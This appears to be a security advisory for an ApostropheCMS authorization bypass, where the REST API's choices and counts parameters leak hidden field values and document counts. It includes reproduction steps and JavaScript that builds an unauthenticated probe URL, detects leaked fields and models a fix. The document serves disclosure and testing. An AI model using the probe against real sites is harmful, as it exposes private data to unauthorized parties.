ApostropheCMS Authorization Bypass Vulnerability in REST API Choices and Counts Query Parameters

Vulnerability

An authorization bypass has been identified in ApostropheCMS versions 4.28.0 and prior. The issue lies in the choices and counts query parameters of the REST API: the query builders behind them run MongoDB distinct operations that are not subject to the module's publicApiProjection, the option intended to limit which fields unauthenticated callers can read. As a result an unauthenticated user can retrieve every distinct value of any schema field that has a registered query builder, including any sensitive data stored in such a field. Fields protected by viewPermission are affected in the same way, and the counts variant additionally discloses how many documents carry each distinct value.

Impact

An unauthenticated attacker can enumerate the distinct values of fields that publicApiProjection or viewPermission was meant to hide and, through the counts variant, learn how many documents hold each value, which leaks statistical information about the dataset. Both are reached through the choices and counts query parameters of the REST API, with no authentication required.

Reproduction

Send an unauthenticated GET request to a piece type's REST API v1 endpoint with a choices or counts query parameter naming a field that the module's publicApiProjection does not include (or that is protected by viewPermission). On an unpatched instance the response contains the distinct values for that field, and for counts the number of documents per value, even though a plain GET for the same documents omits the field. Any HTTP client such as curl or Postman is sufficient.
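The following JavaScript is an added example for the reproduction and for the mechanism described under Vulnerability; it is not code from the advisory or from the ApostropheCMS project. It builds the probe URL, runs the check a tester would apply to the JSON response (which fields came back in choices although the projection hides them, and whether per-value counts were exposed), and models the hardened behaviour a fixed server should have. The assumptions, labelled in the code, are that piece types are served at /api/v1/<module-name>, that choices and counts accept a comma-separated field list and are returned under a top-level choices object, and that the base URL, the customer module, its fields and the sample response are all invented for the example.

```javascript
// Added example, not ApostropheCMS project code. It models the probe a tester
// sends, the check run on the response, and the behaviour a fixed server
// should have. Assumptions: piece types are served at /api/v1/<module-name>;
// `choices` and `counts` take a comma-separated field list and come back
// under a top-level `choices` object; the base URL, module name, field names
// and the captured response below are placeholders invented for the example.

// Probe URL for one piece type. `mode` is "choices" or "counts".
function buildProbeUrl(baseUrl, pieceType, fields, mode = "choices") {
  if (mode !== "choices" && mode !== "counts") {
    throw new Error(`unknown mode: ${mode}`);
  }
  const base = baseUrl.replace(/\/+$/, "");
  const list = fields.map(encodeURIComponent).join(",");
  return `${base}/api/v1/${encodeURIComponent(pieceType)}?${mode}=${list}`;
}

// Field names an unauthenticated caller may see, taken from a module's
// publicApiProjection (MongoDB-style inclusion projection: { field: 1 }).
function allowedFields(publicApiProjection) {
  return new Set(
    Object.entries(publicApiProjection)
      .filter(([, v]) => v === 1 || v === true)
      .map(([k]) => k)
  );
}

// Tester's check on the parsed JSON response: which fields came back in
// `choices` although the projection hides them? Returns the leaked field
// names with their values and, for a counts probe, the per-value counts.
function leakedChoiceFields(responseBody, publicApiProjection) {
  const allowed = allowedFields(publicApiProjection);
  const choices = responseBody.choices || {};
  return Object.keys(choices)
    .filter((f) => !allowed.has(f))
    .map((f) => ({
      field: f,
      values: choices[f].map((c) => c.value),
      counts: choices[f].every((c) => typeof c.count === "number")
        ? choices[f].map((c) => c.count)
        : null
    }));
}

// Hardened behaviour (a model of what a fixed server should do, not the
// project's actual patch): drop any requested field the caller could not
// read on a plain GET, before any distinct query is issued. Unauthenticated
// callers are limited to the projection; a field with viewPermission needs
// that permission regardless of authentication.
function filterRequestedFields(requested, module, caller) {
  const allowed = allowedFields(module.publicApiProjection || {});
  const perms = module.fieldPermissions || {};
  const held = caller.permissions || new Set();
  return requested.filter((f) => {
    if (!caller.authenticated && !allowed.has(f)) return false;
    if (perms[f] && !held.has(perms[f])) return false;
    return true;
  });
}

// Constructed sample: a hypothetical `customer` piece type whose public
// projection exposes only title and slug, an `internalTier` field guarded by
// viewPermission, and a response as an unpatched server would return it to
// an anonymous counts probe (all values invented for the example).
const sampleModule = {
  publicApiProjection: { title: 1, slug: 1 },
  fieldPermissions: { internalTier: "view-customer-tier" }
};
const sampleResponse = {
  results: [],
  choices: {
    title: [{ label: "Acme", value: "Acme", count: 1 }],
    internalTier: [
      { label: "gold", value: "gold", count: 12 },
      { label: "trial", value: "trial", count: 340 }
    ]
  }
};

console.log(buildProbeUrl("https://cms.example/", "customer", ["title", "internalTier"], "counts"));
console.log(JSON.stringify(leakedChoiceFields(sampleResponse, sampleModule.publicApiProjection)));
console.log(filterRequestedFields(["title", "internalTier"], sampleModule, { authenticated: false }));
console.log(filterRequestedFields(["title", "internalTier"], sampleModule, {
  authenticated: true, permissions: new Set(["view-customer-tier"])
}));
```

Send the URL that buildProbeUrl prints with curl or Postman without a session cookie, feed the JSON body to leakedChoiceFields together with the module's publicApiProjection, and any non-empty result is the bypass: values (and, for counts, document counts) for a field a plain GET would not return. The filterRequestedFields model shows the property a fix must restore, namely that the set of fields reachable through choices and counts is never wider than the set readable on an ordinary read for the same caller.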

Remediation

Update to ApostropheCMS version 4.29.0, which fixes this vulnerability.

Added: Apr 15, 2026, 9:43 PM
Updated: Apr 15, 2026, 9:43 PM

Vulnerability Rating

Custom Algorithm
spread: 3.4
impact: 0.6
exploitability: 9.7
remediation: 7.7
relevance: 6.0
threat: 6.4
urgency: 2.9
incentive: 8.3

Our algorithm analyzes dozens of metrics to generate these 8 key vulnerability categories, which are then combined to calculate the overall risk score.